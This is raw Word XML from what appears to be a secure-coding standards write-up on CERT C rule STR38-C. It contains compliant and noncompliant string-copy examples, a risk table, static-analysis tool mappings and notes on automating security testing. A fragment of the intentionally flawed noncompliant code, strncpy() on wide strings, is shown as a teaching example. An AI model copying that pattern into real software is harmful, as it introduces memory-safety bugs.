          <w:p w14:paraId="359F1FD0" w14:textId="77777777" w:rsidR="00BE6AD2" w:rsidRPr="00BE6AD2" w:rsidRDefault="00BE6AD2" w:rsidP="00BE6AD2">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>strncpy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(wide_str2, wide_str1, 10</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="6BD9F1DC" w14:textId="353AA528" w:rsidR="00F72634" w:rsidRDefault="00BE6AD2" w:rsidP="00BE6AD2">
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>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5BD2A89" w:rsidR="00F72634" w:rsidRDefault="00BE6AD2" w:rsidP="0015146B">
            <w:r>
              <w:t xml:space="preserve">Using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:t>wcsncpy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:t>()</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> for wide character strings and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>strncpy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>() for narrow character strings ensures that data is not truncated, and buffer overflow does not occur.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="66F887A3" w14:textId="77777777" w:rsidTr="0015146B">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="28926BF9"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#include &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>string.h</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1444EA81"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#include &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>wchar.h</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32E50F6F"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="188DF47C"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void </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>func</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>(void) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18E906C0"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w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>wchar_t</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> wide_str1[] = L"0123456789</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>";</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="3EB4B516"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w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>wchar_t</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> wide_str2[] = L"0000000000</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>";</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="3593F5D1"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 Use of proper-width function */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="084A3130"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w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>wcsncpy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>(wide_str2, wide_str1, 10</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="214DC53F"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F94CE50"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char narrow_str1[] = "0123456789</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>";</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="4ABBB764"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char narrow_str2[] = "0000000000</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>";</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="1E77597D"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 Use of proper-width function */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63B0C1F0" w14:textId="77777777" w:rsidR="00BE6AD2" w:rsidRPr="00BE6AD2" w:rsidRDefault="00BE6AD2" w:rsidP="00BE6AD2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>strncpy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>(narrow_str2, narrow_str1, 10</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="09D5B7CA" w14:textId="0F0CF081" w:rsidR="00F72634" w:rsidRDefault="00BE6AD2" w:rsidP="00BE6AD2">
            <w:r w:rsidRPr="00BE6AD2">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7C05791" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Principles(s):</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C159E4" w:rsidRPr="008F02CA">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Keep It Simple</w:t>
            </w:r>
            <w:r w:rsidR="00C159E4">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Confusion with wide and narrow character strings can occur when programs add too much complexity. By keeping it simple, this type of confusion can be avoided.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F21822" w14:paraId="7149F2C7" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="087DC360" w14:textId="0AAF2C0D" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>STR38-C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BBCF7D7" w14:textId="274F8D5B" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B7CD542" w14:textId="2B9D230F" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F0E433A" w14:textId="0948522A" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61360AD2" w14:textId="209114E6" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>P27</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F21822" w14:paraId="6B2B24EF" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48BBAB8E" w14:textId="4E8CBA9E" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:hyperlink r:id="rId58" w:history="1">
              <w:r w:rsidRPr="00F21822">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>Helix QAC</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D5FD1DF" w14:textId="77777777" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822"/>
          <w:p w14:paraId="62B1460B" w14:textId="20033BAB" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>2021.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35D2D2B7" w14:textId="77777777" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>C0432</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45D8FD92" w14:textId="73EA8F6B" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>C++0403 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3084A142" w14:textId="088CED04" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F21822" w14:paraId="3EDB9E1C" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7134DB5C" w14:textId="7E8A1A82" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:hyperlink r:id="rId59" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidRPr="00F21822">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>Parasoft</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidRPr="00F21822">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t xml:space="preserve"> C/C++test</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13D0400D" w14:textId="7B094685" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>2021.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3735EE4B" w14:textId="040E26C3" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>CERT_C-STR38-a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B03763C" w14:textId="2ED0183A" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>Do not confuse narrow and wide character strings and functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F21822" w14:paraId="7282C048" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A4D6880" w14:textId="6D802E7F" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:hyperlink r:id="rId60" w:history="1">
              <w:r w:rsidRPr="00F21822">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>PC-lint Plus</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56AE9F2F" w14:textId="24F70A9F" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>1.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="041DC01E" w14:textId="459D8E37" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>2454, 2480, 2481</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="046003E9" w14:textId="7F5FC7BE" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t xml:space="preserve">Partially supported: reports illegal conversions involving pointers to char or </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F21822">
              <w:t>wchar_t</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F21822">
              <w:t xml:space="preserve"> as well as byte/wide-oriented stream inconsistencies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F21822" w14:paraId="7E43A7F6" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D1784AB" w14:textId="52041933" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:hyperlink r:id="rId61" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidRPr="00F21822">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>Polyspace</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidRPr="00F21822">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t xml:space="preserve"> Bug Finder</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A494700" w14:textId="0F186CE2" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>R2021a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58358B4A" w14:textId="5CA7567B" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:hyperlink r:id="rId62" w:history="1">
              <w:r w:rsidRPr="00F21822">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>CERT C: Rule STR38-C</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="192D69E1" w14:textId="0E2B5310" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>Checks for misuse of narrow or wide character string (rule fully covered)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613F0917" w14:textId="0738BCC6" w:rsidR="000E3024" w:rsidRDefault="00713460">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Automation will enforce standards in several areas within the </w:t>
      </w:r>
      <w:r w:rsidR="000E3024">
        <w:t>existing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DevOps. Consider pre-production. A major automation factor can exist in the verify and test phase. We may implement powerful unit testing tools. During these testing phases, tools such as QUnit can be implemented to break built code into testable sections. Through this unit testing, the next round of assessment and planning can be made more efficient through unit testing experiences. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6D0327" w14:textId="77777777" w:rsidR="000E3024" w:rsidRDefault="000E3024">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="485C7819" w14:textId="3E41C529" w:rsidR="00381847" w:rsidRDefault="00713460">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the production phase, we may automate penetration tests. </w:t>
      </w:r>
      <w:r w:rsidR="000E3024">
        <w:t>Utilizing automated software, we can enforce a level of consistent security testing, of product quality. Finally, for monitoring and detection within the production phase, log notifications and risky events may have automatic alerts. By automating this process, full time coverage can be utilized, and problems or alerts can be addressed as they occur.</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917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638"/>
        <w:gridCol w:w="1434"/>
        <w:gridCol w:w="1349"/>
        <w:gridCol w:w="1856"/>
        <w:gridCol w:w="1449"/>
        <w:gridCol w:w="1449"/>
      </w:tblGrid>
      <w:tr w:rsidR="00381847" w14:paraId="668FD8B2" w14:textId="77777777" w:rsidTr="00F21822">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1638"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1449" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p w14:paraId="334CD2C4" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449"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F21822">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1638"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1449" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30C5D21F" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="301ACA4D" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
